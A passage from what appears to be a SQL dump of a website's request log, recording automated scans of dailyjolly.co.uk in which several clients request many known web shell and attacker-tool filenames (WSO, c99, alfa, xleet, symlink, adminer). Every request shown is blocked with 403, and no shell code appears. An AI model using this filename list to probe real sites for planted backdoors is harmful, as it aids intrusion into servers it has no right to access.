Safari\\/537.36\"}','fVYPAdGToyts6QIe2bhKrCFX',0,1674440270.0059,221,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JRZDCBmKWd3i8aFMoQzknjIg',0,1674440270.7059,448,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7U1lbVoJgceA50OELDKvmRBf',0,1674440271.8224,389,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hw9XZ8AVtMuWP1ki72zN3HE0',0,1674440272.3842,195,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6cOFs2p9UYMeGvCPmZ8JK7rA',0,1674440272.8488,350,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QMPe2r9Cqhn31skN740FTEVb',0,1674440273.4497,180,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RDkspHvw19ZPo3Uxad0SIfEX',0,1674440273.9454,188,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7QcVBFDuCfOyxvKEdUG5It8j',0,1674440274.2708,179,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','KAkD97PzihUwQ2VgFGOumXxZ',0,1674440274.8082,194,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kU0ZNpzf3gL4eQ8Vlo5E6FSq',0,1674440275.1852,192,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IkQ5sKgZLGmvOptHbjnoCarM',0,1674440275.5952,180,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','cn0ePIowKDCaRLElmxYgtbi8',0,1674440276.0706,174,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7lENXm4wtOoTjCGksedqgVbp',0,1674440276.6122,186,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aE2RMS5IBoG8wLlPhibgdq7V',0,1674440276.9902,185,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fM1nkvZQHOK7raNR4Cuqjx0s',0,1674440277.3707,250,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SQDHGZMOcAwET9rIaRJnNKxh',0,1674440277.8154,204,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','aXYCxZ62RbVMvySO80jdhHDz',0,1674440278.2153,164,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hKnVwelkEYozt3LjcyCGTM8H',0,1674440279.1046,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BxGwR8s1bDKrLqNS7TYZfAke',0,1674440279.8374,181,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YEUmSFRhDIz25Vlrg6wTXJCW',0,1674440280.2458,235,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9rB8p07LnObiKT5gu3WGSAqX',0,1674440280.6789,245,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','8ZR5wOtSbPpl3N9F0KeqzCja',0,1674440281.2802,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iz7EISJDfKxvoVPrWZg4FjyL',0,1674440281.7437,201,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','FN4p230seSgf7AuDbOTKkz5L',0,1674440282.3183,312,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','F46BarvD2AgbxpRLPCZVfqKs',0,1674440282.8965,199,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Vj7vcfJtQw5sIdmrL8gEPM3H',0,1674440283.4537,168,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mlQqeA0B7Z28a6SHxhNu3dKT',0,1674440283.7664,216,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fDVK8pQRIWhovqP9YXJrsOEx',0,1674440284.5344,210,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xgoHmPqrEV0vsiZpkLI1D5nd',0,1674440284.9871,232,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','AUdL9I4H7psG1jOSBwmvgRQD',0,1674440285.5044,171,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wMl7jd98eOiuLcYn1mChRxW4',0,1674440286.1670,193,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f8M17ZFOhRdl2QNpWe5B9cyk',0,1674440286.9699,241,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','hQqp7bFXTucSdMoYRwvBLaNE',0,1674440287.5593,188,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6x48ejhC23LqlHzOGTfB9pu0',0,1674440288.0663,183,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Zl0qs1VMuSdJYBeK6xPXUnLO',0,1674440288.8812,171,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2DcImHpxVB5aAZNwle7LTJWC',0,1674440289.3217,218,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','6IMEhusaQB5OXDnjwgSZGotp',0,1674440290.0252,171,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','t0zRBncW52DjMGUXaoEkPei1',0,1674440290.6732,244,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','z8FNbsIrKCZxXdBuYvV2hl7q',0,1674440291.1130,200,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wUXrNTeKAHdIB492qZgfzi0L',0,1674440291.6883,164,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','I38CvHMmWLZfyGkTVsSERD9d',0,1674440292.0997,173,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tkSxN3usRgYFiPADO6XBKL49',0,1674440292.7637,202,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','45TyWedSZvFR7JPu8AEHtBQi',0,1674440293.2321,173,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gcELQAMu9tVyOhwe4D2r0ozX',0,1674440293.5603,172,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','67bJUNywm9WFktYMKfvOLPnD',0,1674440294.1987,192,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','owGXuNzKlUiIxCMtSOAJpVd8',0,1674440294.7298,177,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9tuKaAqbR4wQBrDc3MZT1mfN',0,1674440295.2809,182,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','mbk8YeQKADs3oZ5zIL61fJVg',0,1674440295.8017,173,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ngrUDvekwFZiQqR3OXm5P9hy',0,1674440296.4618,166,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yecUPKYIZFnzCg92SXRVoGrb',0,1674440296.8066,171,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','a2JkiDwd1V4YtEjcOeQPSLZ5',0,1674440297.1417,181,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jhEqvIxriCOnYoXgcMAfabV5',0,1674440297.6782,191,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','QueAoPhwzJMF9fkrSYC4sEga',0,1674440298.1300,234,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MYZgSb1EyjwtBAp8FNQqJIXz',0,1674440298.5506,223,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4YiXR2Kez7QjCFPx0M5u86oD',0,1674440298.9530,255,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Hu2QRGlWrwkKPUijanFc5NV7',0,1674440299.4851,177,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wYR4kZiqc1A2vV5h6W9FGUNO',0,1674440299.8266,339,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','3O1ASnx4gWRcM7TbLzyQB0rh',0,1674440300.6695,197,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','r4m6vMFbCHjDafSzihtEULJd',0,1674440301.1290,211,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','yk6LwZYBKVqD20jpAFMmNlnt',0,1674440301.6863,201,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','gQsKxVXRuWB1iA8tDIzoLaYT',0,1674440302.7929,190,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','VdxHOGfiluecaMvI60ZNb2t3',0,1674440303.6480,203,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','wzOIrCbMVlESxtTDZoYfv4q6',0,1674440304.3055,175,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4bs9lMohXdj3Gyv8iftKARcT',0,1674440304.8157,173,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','SHrzUbPA8kRQv1Lol7FhJZKT',0,1674440305.3731,182,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','MfKucI58C1NEG6kOJ3Up9Q04',0,1674440305.7988,189,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','vaCymsrNAdMWqPOXIkDHRliE',0,1674440306.3753,174,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NMuOYnyCfqR6Bt5rmeJTLkSA',0,1674440306.9877,171,'','GET',403,0,700,0,1,'',0),('160.176.20.205',2695894221,'','https://dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jdYgxlM1LrBXIFeU0AO9iySN',0,1674440307.4227,222,'','GET',403,0,700,0,1,'',0),('95.191.46.92',1606364764,'','https://dailyjolly.co.uk/adminer.php','','{\"1\":\"python-requests\\/2.25.1\"}','IjgFQOB0vcXpdynlJWKD3qs5',0,1674455270.0650,471,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BGW4iOzFYTRvosNyZS6DlX5x',0,1674458738.8882,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0pvEWdCBtmV4AoKbU7rZj5wk',0,1674458739.7737,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tRhHWSM4iJlbsUew9FY0Df2A',0,1674458740.7870,193,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QHsXScBLO8wdJxjnMZgGEtmA',0,1674458741.6798,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nZukzqTy87t9vFVUcAo2PHOw',0,1674458742.5674,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','znkdYChScifpqZmaQrWRVNt7',0,1674458743.4807,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','VhevgXUEw1aZD0sudRJ5i6MY',0,1674458744.3728,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','grpwnisvFxf5UWaJ4NhLDTAK',0,1674458745.2611,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tNL0B4eZ3IvbqusEG92Sx75K',0,1674458746.1266,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','msxUdYcXJDCVnzW8yIAuShoB',0,1674458747.0585,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','n3ZNU016VtIW8b4AmBd7f9qe',0,1674458747.9407,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 